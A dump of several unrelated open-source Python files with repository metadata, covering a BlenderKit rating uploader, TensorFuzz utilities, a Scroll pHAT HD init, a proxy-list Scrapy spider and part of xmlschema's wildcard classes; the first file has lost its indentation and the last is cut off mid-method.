"MS-PL"
] | null | null | null | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
if "bpy" in locals():
from importlib import reload
paths = reload(paths)
utils = reload(utils)
rerequests = reload(rerequests)
tasks_queue = reload(tasks_queue)
else:
from blenderkit import paths, utils, rerequests, tasks_queue
import bpy
import requests, threading
from bpy.props import (
IntProperty,
FloatProperty,
StringProperty,
EnumProperty,
BoolProperty,
PointerProperty,
)
from bpy.types import (
Operator,
Panel,
)
def pretty_print_POST(req):
"""
pretty print a request
"""
print('{}\n{}\n{}\n\n{}'.format(
'-----------START-----------',
req.method + ' ' + req.url,
'\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()),
req.body,
))
def upload_rating_thread(url, ratings, headers):
''' Upload rating thread function / disconnected from blender data.'''
utils.p('upload rating', url, ratings)
for rating_name, score in ratings:
if (score != -1 and score != 0):
rating_url = url + rating_name + '/'
data = {
"score": score, # todo this kind of mixing is too much. Should have 2 bkit structures, upload, use
}
try:
r = rerequests.put(rating_url, data=data, verify=True, headers=headers)
except requests.exceptions.RequestException as e:
print('ratings upload failed: %s' % str(e))
def send_rating_to_thread_quality(url, ratings, headers):
'''Sens rating into thread rating, main purpose is for tasks_queue.
One function per property to avoid lost data due to stashing.'''
thread = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
thread.start()
def send_rating_to_thread_work_hours(url, ratings, headers):
'''Sens rating into thread rating, main purpose is for tasks_queue.
One function per property to avoid lost data due to stashing.'''
thread = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
thread.start()
def upload_review_thread(url, reviews, headers):
r = rerequests.put(url, data=reviews, verify=True, headers=headers)
# except requests.exceptions.RequestException as e:
# print('reviews upload failed: %s' % str(e))
def get_rating(asset_id):
#this function isn't used anywhere,should probably get removed.
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
rl = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
rtypes = ['quality', 'working_hours']
for rt in rtypes:
params = {
'rating_type': rt
}
r = rerequests.get(r1, params=data, verify=True, headers=headers)
print(r.text)
def update_ratings_quality(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
asset = self.id_data
bkit_ratings = asset.bkit_ratings
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
if bkit_ratings.rating_quality > 0.1:
ratings = [('quality', bkit_ratings.rating_quality)]
tasks_queue.add_task((send_rating_to_thread_quality, (url, ratings, headers)), wait=1, only_last=True)
def update_ratings_work_hours(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
asset = self.id_data
bkit_ratings = asset.bkit_ratings
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
if bkit_ratings.rating_work_hours > 0.05:
ratings = [('working_hours', round(bkit_ratings.rating_work_hours, 1))]
tasks_queue.add_task((send_rating_to_thread_work_hours, (url, ratings, headers)), wait=1, only_last=True)
def upload_rating(asset):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
bkit_ratings = asset.bkit_ratings
# print('rating asset', asset_data['name'], asset_data['assetBaseId'])
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
ratings = [
]
if bkit_ratings.rating_quality > 0.1:
ratings.append(('quality', bkit_ratings.rating_quality))
if bkit_ratings.rating_work_hours > 0.1:
ratings.append(('working_hours', round(bkit_ratings.rating_work_hours, 1)))
thread = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
thread.start()
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/review'
reviews = {
'reviewText': bkit_ratings.rating_compliments,
'reviewTextProblems': bkit_ratings.rating_problems,
}
if not (bkit_ratings.rating_compliments == '' and bkit_ratings.rating_compliments == ''):
thread = threading.Thread(target=upload_review_thread, args=(url, reviews, headers))
thread.start()
# the info that the user rated an item is stored in the scene
s = bpy.context.scene
s['assets rated'] = s.get('assets rated', {})
if bkit_ratings.rating_quality > 0.1 and bkit_ratings.rating_work_hours > 0.1:
s['assets rated'][asset['asset_data']['assetBaseId']] = True
def get_assets_for_rating():
'''
gets assets from scene that could/should be rated by the user.
TODO this is only a draft.
'''
assets = []
for ob in bpy.context.scene.objects:
if ob.get('asset_data'):
assets.append(ob)
for m in bpy.data.materials:
if m.get('asset_data'):
assets.append(m)
for b in bpy.data.brushes:
if b.get('asset_data'):
assets.append(b)
return assets
# class StarRatingOperator(bpy.types.Operator):
# """Tooltip"""
# bl_idname = "object.blenderkit_rating"
# bl_label = "Rate the Asset Quality"
# bl_options = {'REGISTER', 'INTERNAL'}
#
# property_name: StringProperty(
# name="Rating Property",
# description="Property that is rated",
# default="",
# )
#
# rating: IntProperty(name="Rating", description="rating value", default=1, min=1, max=10)
#
# def execute(self, context):
# asset = utils.get_active_asset()
# props = asset.bkit_ratings
# props.rating_quality = self.rating
# return {'FINISHED'}
asset_types = (
('MODEL', 'Model', 'set of objects'),
('SCENE', 'Scene', 'scene'),
('MATERIAL', 'Material', 'any .blend Material'),
('TEXTURE', 'Texture', 'a texture, or texture set'),
('BRUSH', 'Brush', 'brush, can be any type of blender brush'),
('ADDON', 'Addon', 'addnon'),
)
# TODO drop this operator, not needed anymore.
class UploadRatingOperator(bpy.types.Operator):
"""Upload rating to the web db"""
bl_idname = "object.blenderkit_rating_upload"
bl_label = "Send Rating"
bl_options = {'REGISTER', 'UNDO', 'INTERNAL'}
# type of upload - model, material, textures, e.t.c.
# asset_type: EnumProperty(
# name="Type",
# items=asset_types,
# description="Type of asset",
# default="MODEL",
# )
# @classmethod
# def poll(cls, context):
# return bpy.context.active_object != None and bpy.context.active_object.get('asset_id') is not None
def draw(self, context):
layout = self.layout
layout.label(text='Rating sent to server. Thanks for rating!')
def execute(self, context):
return {'FINISHED'}
def invoke(self, context, event):
wm = context.window_manager
asset = utils.get_active_asset()
upload_rating(asset)
return wm.invoke_props_dialog(self)
def draw_rating(layout, props, prop_name, name):
# layout.label(name)
row = layout.row(align=True)
# test method - 10 booleans.
# propsx = bpy.context.active_object.bkit_ratings
# for a in range(0, 10):
# pn = f'rq{str(a+1).zfill(2)}'
# if eval('propsx.' + pn) == False:
# icon = 'SOLO_OFF'
# else:
# icon = 'SOLO_ON'
# row.prop(propsx, pn, icon=icon, icon_only=True)
# print(dir(props))
# new best method - enum with an items callback. ('animates' the stars as item icons)
row.prop(props, 'rating_quality_ui', expand=True, icon_only=True, emboss = False)
# original (operator) method:
# row = layout.row(align=True)
# for a in range(0, 10):
# if eval('props.' + prop_name) < a + 1:
# icon = 'SOLO_OFF'
# else:
# icon = 'SOLO_ON'
#
# op = row.operator('object.blenderkit_rating', icon=icon, emboss=False, text='')
# op.property_name = prop_name
# op.rating = a + 1
def register_ratings():
pass;
# bpy.utils.register_class(StarRatingOperator)
bpy.utils.register_class(UploadRatingOperator)
def unregister_ratings():
pass;
# bpy.utils.unregister_class(StarRatingOperator)
bpy.utils.unregister_class(UploadRatingOperator)
| 33.824916 | 115 | 0.652897 |
16520f666ec99a8f0593e1d72468bbe7c21119a9 | 190 | py | Python | run_alleles.py | yeastgenome/SGDAllianceData | 473efa14515d10f3aadf7f50d58edb42873176d0 | [
"MIT"
] | 1 | 2019-02-11T23:34:04.000Z | 2019-02-11T23:34:04.000Z | run_alleles.py | yeastgenome/SGDAllianceData | 473efa14515d10f3aadf7f50d58edb42873176d0 | [
"MIT"
] | 5 | 2021-01-26T19:53:32.000Z | 2022-03-21T22:23:12.000Z | run_alleles.py | yeastgenome/SGDAllianceData | 473efa14515d10f3aadf7f50d58edb42873176d0 | [
"MIT"
] | 1 | 2020-05-22T16:14:36.000Z | 2020-05-22T16:14:36.000Z | import os
from src.alleles.alleles import get_allele_information
THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))
if __name__ == "__main__":
get_allele_information(THIS_FOLDER) | 27.142857 | 56 | 0.805263 |
f7ad3f1afa0487e696f02d356beaf28b21ad6377 | 7,303 | py | Python | tensorfuzz/fuzz_utils.py | dlshriver/tensorfuzz | a81df1b9b62f4d3176af35cf545bef16cf65a05f | [
"Apache-2.0"
] | null | null | null | tensorfuzz/fuzz_utils.py | dlshriver/tensorfuzz | a81df1b9b62f4d3176af35cf545bef16cf65a05f | [
"Apache-2.0"
] | null | null | null | tensorfuzz/fuzz_utils.py | dlshriver/tensorfuzz | a81df1b9b62f4d3176af35cf545bef16cf65a05f | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for the fuzzer library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import random as random
import numpy as np
import scipy
import tensorflow as tf
import tensorfuzz.dataset as mnist
def basic_mnist_input_corpus(choose_randomly=False, data_dir="/tmp/mnist"):
"""Returns the first image and label from MNIST.
Args:
choose_randomly: a boolean indicating whether to choose randomly.
data_dir: a string giving the location of the original MNIST data.
Returns:
A single image and a single label.
"""
dataset = mnist.train(data_dir)
dataset = dataset.cache().shuffle(buffer_size=50000).batch(100).repeat()
iterator = dataset.make_one_shot_iterator()
images, integer_labels = iterator.get_next()
images = tf.reshape(images, [-1, 28, 28, 1])
# labels = tf.one_hot(integer_labels, 10)
labels = integer_labels
with tf.train.MonitoredTrainingSession() as sess:
image_batch, label_batch = sess.run([images, labels])
if choose_randomly:
idx = random.choice(range(image_batch.shape[0]))
else:
idx = 0
tf.logging.info("Seeding corpus with element at idx: %s", idx)
return image_batch[idx], label_batch[idx]
def imsave(image, path):
"""Saves an image to a given path.
This function has the side-effect of writing to disk.
Args:
image: The Numpy array representing the image.
path: A Filepath.
"""
image = np.squeeze(image)
with tf.gfile.Open(path, mode="w") as fptr:
scipy.misc.imsave(fptr, image)
def build_feed_dict(input_tensors, input_batches):
"""Constructs a feed_dict to pass to the run method of TensorFlow Session.
In the logic we assume all tensors should have the same batch size.
However, we have to do some crazy stuff to deal with the case when
some of the tensors have concrete shapes and some don't, especially
when we're constructing the seed corpus.
Args:
input_tensors: The TF tensors into which we will feed the fuzzed inputs.
input_batches: Numpy arrays that will be fed into the input tensors.
Returns:
The feed_dict described above.
"""
feed_dict = {}
# If the tensor has concrete shape and we are feeding in something that has a
# non-matching shape, we will need to tile it to make it work.
tensor_bszs = [x.get_shape().as_list()[0] for x in input_tensors]
should_tile = any([x is not None for x in tensor_bszs])
if should_tile:
max_tensor_bsz = max([x for x in tensor_bszs if x is not None])
for idx in range(len(list(zip(input_tensors, input_batches)))):
np_bsz = input_batches[idx].shape[0]
if should_tile and np_bsz != max_tensor_bsz:
tf.logging.info(
"Tiling feed_dict inputs due to concrete batch sizes."
)
this_shape = [max_tensor_bsz // np_bsz] + [
1 for _ in range(len(input_batches[idx].shape[1:]))
]
input_batches[idx] = np.tile(input_batches[idx], this_shape)
# Note that this will truncate one of input_tensors or input_batches
# if either of them is longer. This is WAI right now, because we sometimes
# want to store the label for an image classifier for which we don't have
# a label placeholder in the checkpoint.
for input_tensor, input_batch in list(zip(input_tensors, input_batches)):
feed_dict[input_tensor] = input_batch
return feed_dict
def get_tensors_from_checkpoint(sess, checkpoint_dir):
"""Loads and returns the fuzzing tensors given a session and a directory.
It's assumed that the checkpoint directory has checkpoints from a TensorFlow
model, and moreoever that those checkpoints have 3 collections:
1. input_tensors: The tensors into which we will feed the fuzzed inputs.
2. coverage_tensors: The tensors from which we will fetch information needed
to compute the coverage. The coverage will be used to guide the fuzzing
process.
3. metadata_tensors: The tensors from which we will fetch information needed
to compute the metadata. The metadata can be used for computing the fuzzing
objective or just to track the progress of fuzzing.
Args:
sess: a TensorFlow Session object.
checkpoint_dir: a directory containing the TensorFlow checkpoints.
Returns:
The 3 lists of tensorflow tensors described above.
"""
potential_files = tf.gfile.ListDirectory(checkpoint_dir)
meta_files = [f for f in potential_files if f.endswith(".meta")]
# Sort the meta files by global step
meta_files.sort(key=lambda f: int(f[: -len(".meta")].split("-")[-1]))
meta_file = meta_files[-1]
explicit_meta_path = os.path.join(checkpoint_dir, meta_file)
explicit_checkpoint_path = explicit_meta_path[: -len(".meta")]
tf.logging.info("Visualizing checkpoint: %s", explicit_checkpoint_path)
new_saver = tf.train.import_meta_graph(
explicit_meta_path, clear_devices=True
)
new_saver.restore(sess, explicit_checkpoint_path)
input_tensors = tf.get_collection("input_tensors")
coverage_tensors = tf.get_collection("coverage_tensors")
metadata_tensors = tf.get_collection("metadata_tensors")
tensor_map = {
"input": input_tensors,
"coverage": coverage_tensors,
"metadata": metadata_tensors,
}
return tensor_map
def fetch_function(
sess, input_tensors, coverage_tensors, metadata_tensors, input_batches
):
"""Fetches from the TensorFlow runtime given inputs.
Args:
sess: a TensorFlow Session object.
input_tensors: TF tensors to which we feed input_batches.
coverage_tensors: TF tensors we fetch for coverage.
metadata_tensors: TF tensors we fetch for metadata.
input_batches: numpy arrays we feed to input_tensors.
Returns:
Coverage and metadata as lists of numpy arrays.
"""
feed_dict = build_feed_dict(input_tensors, input_batches)
fetched_data = sess.run(
coverage_tensors + metadata_tensors, feed_dict=feed_dict
)
idx = len(coverage_tensors)
coverage_batches = fetched_data[:idx]
metadata_batches = fetched_data[idx:]
return coverage_batches, metadata_batches
def build_fetch_function(sess, tensor_map):
"""Constructs fetch function given session and tensors."""
def func(input_batches):
"""The fetch function."""
return fetch_function(
sess,
tensor_map["input"],
tensor_map["coverage"],
tensor_map["metadata"],
input_batches,
)
return func
| 36.515 | 81 | 0.702999 |
9cc69432736e896a09a76fb0bb6e8505094ac400 | 867 | py | Python | library/scrollphathd/__init__.py | mic2100/casper-script | 43841d832317ea6e3c65d52ccacfcf084210395a | [
"MIT"
] | null | null | null | library/scrollphathd/__init__.py | mic2100/casper-script | 43841d832317ea6e3c65d52ccacfcf084210395a | [
"MIT"
] | null | null | null | library/scrollphathd/__init__.py | mic2100/casper-script | 43841d832317ea6e3c65d52ccacfcf084210395a | [
"MIT"
] | null | null | null | from sys import version_info
from .api.http import start_background_thread, scrollphathd_blueprint
from . import is31fl3731
__version__ = '1.2.0'
display = is31fl3731.ScrollPhatHD(None, gamma_table=is31fl3731.LED_GAMMA)
DISPLAY_HEIGHT = display._height
DISPLAY_WIDTH = display._width
pixel = display.set_pixel
set_pixel = display.set_pixel
set_brightness = display.set_brightness
set_font = display.set_font
show = display.show
scroll = display.scroll
fill = display.fill
clear_rect = display.clear_rect
width = display.width
height = display.height
scroll_to = display.scroll_to
rotate = display.rotate
flip = display.flip
draw_char = display.draw_char
write_string = display.write_string
clear = display.clear
set_graph = display.set_graph
get_buffer_shape = display.get_buffer_shape
get_shape = display.get_shape
set_clear_on_exit = display.set_clear_on_exit
| 26.272727 | 73 | 0.825836 |
6f33080a4f0194534a8e7e00b8c5b21d0a16f4c0 | 2,146 | py | Python | webapi/core/proxy_fetchers/freeproxylistsnet.py | shovradas/proxy-fellow | fdecc5d408496ba31aef70da4d17ee5869ed7dc5 | [
"MIT"
] | 1 | 2020-07-31T21:47:47.000Z | 2020-07-31T21:47:47.000Z | webapi/core/proxy_fetchers/freeproxylistsnet.py | shovradas/proxy-fellow | fdecc5d408496ba31aef70da4d17ee5869ed7dc5 | [
"MIT"
] | 13 | 2020-05-28T00:57:27.000Z | 2020-05-28T14:58:25.000Z | webapi/core/proxy_fetchers/freeproxylistsnet.py | shovradas/proxy-ally | fdecc5d408496ba31aef70da4d17ee5869ed7dc5 | [
"MIT"
] | null | null | null | import scrapy, os, json
from urllib.parse import unquote, urljoin
from urllib.request import pathname2url
import ast
from config import DEBUG
# DEBUG=False
# custom spider having the parse logic
class ProxyScrapSpider(scrapy.Spider):
name = 'freeproxylistsnet'
page_number=2
max_page=5
def start_requests(self):
if DEBUG:
url = urljoin('file:', pathname2url(f'{os.getcwd()}/core/proxy_fetchers/providers_offline/freeproxylistsnet.html'))
yield scrapy.Request(url, self.parse)
else:
yield scrapy.Request('http://www.freeproxylists.net/', self.parse)
def parse(self, response):
table = response.xpath('//table[@class="DataGrid"]')[0]
trs = table.xpath('tr')
for tr in trs:
tds = tr.xpath('td')
if len(tds)>1:
ip_text = tds[0].xpath('script/text()').extract_first()
if ip_text:
ip_text = unquote(ip_text.split('"')[1])
ip_text = scrapy.Selector(text = ip_text)
yield {
'ip': ip_text.xpath('//a/text()').extract_first(),
'port': int(tds[1].xpath('text()').extract_first()),
'https': tds[2].xpath('text()').extract_first()
}
if not DEBUG:
next_page = f'http://www.freeproxylists.net/?page={ProxyScrapSpider.page_number}'
if ProxyScrapSpider.page_number <= ProxyScrapSpider.max_page:
ProxyScrapSpider.page_number += 1
yield response.follow(next_page, callback=self.parse)
def fetch(config):
ProxyScrapSpider.custom_settings = {
'DOWNLOAD_DELAY': config['downloadDelay']
}
# core.proxy_fetchers.proxydashlistdownload.ProxyApiSpider
spider = '.'.join([__name__, ProxyScrapSpider.__name__])
data = os.popen(f'python {os.getcwd()}/core/proxy_fetchers/fetch.py {spider}').read()
return ast.literal_eval(data.strip())
if __name__ == '__main__':
data = fetch()
print(json.dumps(data, indent=4), f'count: {len(data)}') | 37 | 127 | 0.595993 |
64c20fe17b9099865ec8c5f91491b114c67a3852 | 32,993 | py | Python | xmlschema/validators/wildcards.py | jonringer/xmlschema | 9645bb52ae693b45f494af41af144a2a1f0e64d8 | [
"MIT"
] | null | null | null | xmlschema/validators/wildcards.py | jonringer/xmlschema | 9645bb52ae693b45f494af41af144a2a1f0e64d8 | [
"MIT"
] | null | null | null | xmlschema/validators/wildcards.py | jonringer/xmlschema | 9645bb52ae693b45f494af41af144a2a1f0e64d8 | [
"MIT"
] | null | null | null | #
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module contains classes for XML Schema wildcards.
"""
from ..exceptions import XMLSchemaValueError
from ..namespaces import XSI_NAMESPACE
from ..qnames import XSD_ANY, XSD_ANY_ATTRIBUTE, XSD_OPEN_CONTENT, \
XSD_DEFAULT_OPEN_CONTENT, XSI_TYPE, get_namespace
from ..xpath import XMLSchemaProxy, ElementPathMixin
from .xsdbase import ValidationMixin, XsdComponent, ParticleMixin
class XsdWildcard(XsdComponent, ValidationMixin):
names = ()
namespace = ('##any',)
not_namespace = ()
not_qname = ()
process_contents = 'strict'
def __repr__(self):
if self.not_namespace:
return '%s(not_namespace=%r, process_contents=%r)' % (
self.__class__.__name__, self.not_namespace, self.process_contents
)
else:
return '%s(namespace=%r, process_contents=%r)' % (
self.__class__.__name__, self.namespace, self.process_contents
)
def _parse(self):
super(XsdWildcard, self)._parse()
# Parse namespace and processContents
namespace = self.elem.get('namespace', '##any').strip()
if namespace == '##any':
pass
elif not namespace:
self.namespace = [] # an empty value means no namespace allowed!
elif namespace == '##other':
self.namespace = [namespace]
elif namespace == '##local':
self.namespace = ['']
elif namespace == '##targetNamespace':
self.namespace = [self.target_namespace]
else:
self.namespace = []
for ns in namespace.split():
if ns == '##local':
self.namespace.append('')
elif ns == '##targetNamespace':
self.namespace.append(self.target_namespace)
elif ns.startswith('##'):
self.parse_error("wrong value %r in 'namespace' attribute" % ns)
else:
self.namespace.append(ns)
process_contents = self.elem.get('processContents', 'strict')
if process_contents == 'strict':
pass
elif process_contents not in ('lax', 'skip'):
self.parse_error("wrong value %r for 'processContents' "
"attribute" % self.process_contents)
else:
self.process_contents = process_contents
def _parse_not_constraints(self):
if 'notNamespace' not in self.elem.attrib:
pass
elif 'namespace' in self.elem.attrib:
self.parse_error("'namespace' and 'notNamespace' attributes are mutually exclusive")
else:
self.namespace = []
self.not_namespace = []
for ns in self.elem.attrib['notNamespace'].strip().split():
if ns == '##local':
self.not_namespace.append('')
elif ns == '##targetNamespace':
self.not_namespace.append(self.target_namespace)
elif ns.startswith('##'):
self.parse_error("wrong value %r in 'notNamespace' attribute" % ns)
else:
self.not_namespace.append(ns)
# Parse notQName attribute
if 'notQName' not in self.elem.attrib:
return
not_qname = self.elem.attrib['notQName'].strip().split()
if isinstance(self, XsdAnyAttribute) and \
not all(not s.startswith('##') or s == '##defined'
for s in not_qname) or \
not all(not s.startswith('##') or s in {'##defined', '##definedSibling'}
for s in not_qname):
self.parse_error("wrong value for 'notQName' attribute")
return
try:
names = [x if x.startswith('##') else self.schema.resolve_qname(x, False)
for x in not_qname]
except KeyError as err:
self.parse_error("unmapped QName in 'notQName' attribute: %s" % str(err))
return
except ValueError as err:
self.parse_error("wrong QName format in 'notQName' attribute: %s" % str(err))
return
if self.not_namespace:
if any(not x.startswith('##') for x in names) and \
all(get_namespace(x) in self.not_namespace
for x in names if not x.startswith('##')):
self.parse_error("the namespace of each QName in notQName "
"is allowed by notNamespace")
elif any(not self.is_namespace_allowed(get_namespace(x))
for x in names if not x.startswith('##')):
self.parse_error("names in notQName must be in namespaces that are allowed")
self.not_qname = names
@property
def built(self):
return True
def is_matching(self, name, default_namespace=None, **kwargs):
if name is None:
return False
elif not name or name[0] == '{':
return self.is_namespace_allowed(get_namespace(name))
elif default_namespace is None:
return self.is_namespace_allowed('')
else:
return self.is_namespace_allowed('') or \
self.is_namespace_allowed(default_namespace)
def is_namespace_allowed(self, namespace):
if self.not_namespace:
return namespace not in self.not_namespace
elif '##any' in self.namespace or namespace == XSI_NAMESPACE:
return True
elif '##other' in self.namespace:
return namespace and namespace != self.target_namespace
else:
return namespace in self.namespace
def deny_namespaces(self, namespaces):
if self.not_namespace:
return all(x in self.not_namespace for x in namespaces)
elif '##any' in self.namespace:
return False
elif '##other' in self.namespace:
return all(x == self.target_namespace for x in namespaces)
else:
return all(x not in self.namespace for x in namespaces)
def deny_qnames(self, names):
if self.not_namespace:
return all(x in self.not_qname or get_namespace(x) in self.not_namespace
for x in names)
elif '##any' in self.namespace:
return all(x in self.not_qname for x in names)
elif '##other' in self.namespace:
return all(x in self.not_qname or get_namespace(x) == self.target_namespace
for x in names)
else:
return all(x in self.not_qname or get_namespace(x) not in self.namespace
for x in names)
def is_restriction(self, other, check_occurs=True):
if check_occurs and isinstance(self, ParticleMixin) \
and not self.has_occurs_restriction(other):
return False
elif not isinstance(other, type(self)):
return False
elif other.process_contents == 'strict' and self.process_contents != 'strict':
return False
elif other.process_contents == 'lax' and self.process_contents == 'skip':
return False
if not self.not_qname and not other.not_qname:
pass
elif '##defined' in other.not_qname and '##defined' not in self.not_qname:
return False
elif '##definedSibling' in other.not_qname and '##definedSibling' not in self.not_qname:
return False
elif other.not_qname:
if not self.deny_qnames(x for x in other.not_qname if not x.startswith('##')):
return False
elif any(not other.is_namespace_allowed(get_namespace(x))
for x in self.not_qname if not x.startswith('##')):
return False
if self.not_namespace:
if other.not_namespace:
return all(ns in self.not_namespace for ns in other.not_namespace)
elif '##any' in other.namespace:
return True
elif '##other' in other.namespace:
return '' in self.not_namespace and other.target_namespace in self.not_namespace
else:
return False
elif other.not_namespace:
if '##any' in self.namespace:
return False
elif '##other' in self.namespace:
return set(other.not_namespace).issubset({'', other.target_namespace})
else:
return all(ns not in other.not_namespace for ns in self.namespace)
if self.namespace == other.namespace:
return True
elif '##any' in other.namespace:
return True
elif '##any' in self.namespace or '##other' in self.namespace:
return False
elif '##other' in other.namespace:
return other.target_namespace not in self.namespace and '' not in self.namespace
else:
return all(ns in other.namespace for ns in self.namespace)
def union(self, other):
"""
Update an XSD wildcard with the union of itself and another XSD wildcard.
"""
if not self.not_qname:
self.not_qname = other.not_qname[:]
else:
self.not_qname = [
x for x in self.not_qname
if x in other.not_qname or not other.is_namespace_allowed(get_namespace(x))
]
if self.not_namespace:
if other.not_namespace:
self.not_namespace = [ns for ns in self.not_namespace if ns in other.not_namespace]
elif '##any' in other.namespace:
self.not_namespace = []
self.namespace = ['##any']
return
elif '##other' in other.namespace:
not_namespace = ('', other.target_namespace)
self.not_namespace = [ns for ns in self.not_namespace if ns in not_namespace]
else:
self.not_namespace = [ns for ns in self.not_namespace if ns not in other.namespace]
if not self.not_namespace:
self.namespace = ['##any']
return
elif other.not_namespace:
if '##any' in self.namespace:
return
elif '##other' in self.namespace:
not_namespace = ('', self.target_namespace)
self.not_namespace = [ns for ns in other.not_namespace if ns in not_namespace]
else:
self.not_namespace = [ns for ns in other.not_namespace if ns not in self.namespace]
self.namespace = ['##any'] if not self.not_namespace else []
return
if '##any' in self.namespace or self.namespace == other.namespace:
return
elif '##any' in other.namespace:
self.namespace = ['##any']
return
elif '##other' in other.namespace:
w1, w2 = other, self
elif '##other' in self.namespace:
w1, w2 = self, other
else:
self.namespace.extend(ns for ns in other.namespace if ns not in self.namespace)
return
if w1.target_namespace in w2.namespace and '' in w2.namespace:
self.namespace = ['##any']
elif '' not in w2.namespace and w1.target_namespace == w2.target_namespace:
self.namespace = ['##other']
elif self.xsd_version == '1.0':
msg = "not expressible wildcard namespace union: {!r} V {!r}:"
raise XMLSchemaValueError(msg.format(other.namespace, self.namespace))
else:
self.namespace = []
self.not_namespace = ['', w1.target_namespace] if w1.target_namespace else ['']
def intersection(self, other):
"""
Update an XSD wildcard with the intersection of itself and another XSD wildcard.
"""
if self.not_qname:
self.not_qname.extend(x for x in other.not_qname if x not in self.not_qname)
else:
self.not_qname = [x for x in other.not_qname]
if self.not_namespace:
if other.not_namespace:
self.not_namespace.extend(ns for ns in other.not_namespace
if ns not in self.not_namespace)
elif '##any' in other.namespace:
pass
elif '##other' not in other.namespace:
self.namespace = [ns for ns in other.namespace if ns not in self.not_namespace]
self.not_namespace = []
else:
if other.target_namespace not in self.not_namespace:
self.not_namespace.append(other.target_namespace)
if '' not in self.not_namespace:
self.not_namespace.append('')
return
elif other.not_namespace:
if '##any' in self.namespace:
self.not_namespace = [ns for ns in other.not_namespace]
self.namespace = []
elif '##other' not in self.namespace:
self.namespace = [ns for ns in self.namespace if ns not in other.not_namespace]
else:
self.not_namespace = [ns for ns in other.not_namespace]
if self.target_namespace not in self.not_namespace:
self.not_namespace.append(self.target_namespace)
if '' not in self.not_namespace:
self.not_namespace.append('')
self.namespace = []
return
if self.namespace == other.namespace:
return
elif '##any' in other.namespace:
return
elif '##any' in self.namespace:
self.namespace = other.namespace[:]
elif '##other' in self.namespace:
self.namespace = [ns for ns in other.namespace if ns not in ('', self.target_namespace)]
elif '##other' not in other.namespace:
self.namespace = [ns for ns in self.namespace if ns in other.namespace]
else:
if other.target_namespace in self.namespace:
self.namespace.remove(other.target_namespace)
if '' in self.namespace:
self.namespace.remove('')
def iter_decode(self, source, validation='lax', **kwargs):
raise NotImplementedError
def iter_encode(self, obj, validation='lax', **kwargs):
raise NotImplementedError
class XsdAnyElement(XsdWildcard, ParticleMixin, ElementPathMixin):
"""
Class for XSD 1.0 *any* wildcards.
.. <any
id = ID
maxOccurs = (nonNegativeInteger | unbounded) : 1
minOccurs = nonNegativeInteger : 1
namespace = ((##any | ##other) | List of (anyURI | (##targetNamespace|##local)) ) : ##any
processContents = (lax | skip | strict) : strict
{any attributes with non-schema namespace . . .}>
Content: (annotation?)
</any>
"""
_ADMITTED_TAGS = {XSD_ANY}
precedences = ()
def __init__(self, elem, schema, parent):
super(XsdAnyElement, self).__init__(elem, schema, parent)
ElementPathMixin.__init__(self)
def __repr__(self):
if self.namespace:
return '%s(namespace=%r, process_contents=%r, occurs=%r)' % (
self.__class__.__name__, self.namespace, self.process_contents, self.occurs
)
else:
return '%s(not_namespace=%r, process_contents=%r, occurs=%r)' % (
self.__class__.__name__, self.not_namespace, self.process_contents, self.occurs
)
@property
def xpath_proxy(self):
return XMLSchemaProxy(self.schema, self)
def _parse(self):
super(XsdAnyElement, self)._parse()
self._parse_particle(self.elem)
def match(self, name, default_namespace=None, resolve=False, **kwargs):
"""
Returns the element wildcard if name is matching the name provided
as argument, `None` otherwise.
:param name: a local or fully-qualified name.
:param default_namespace: used when it's not `None` and not empty for \
completing local name arguments.
:param resolve: when `True` it doesn't return the wildcard but try to \
resolve and return the element matching the name.
:param kwargs: additional options used by XSD 1.1 xs:any wildcards.
"""
if not self.is_matching(name, default_namespace, **kwargs):
return
elif not resolve:
return self
try:
if name[0] != '{' and default_namespace:
return self.maps.lookup_element('{%s}%s' % (default_namespace, name))
else:
return self.maps.lookup_element(name)
except LookupError:
pass
def __iter__(self):
return iter(())
def iter(self, tag=None):
return iter(())
def iterchildren(self, tag=None):
return iter(())
@staticmethod
def iter_substitutes():
return iter(())
def iter_decode(self, elem, validation='lax', **kwargs):
if not self.is_matching(elem.tag):
if validation != 'skip':
reason = "{!r} is not allowed here".format(elem)
yield self.validation_error(validation, reason, elem, **kwargs)
elif self.process_contents == 'skip':
return
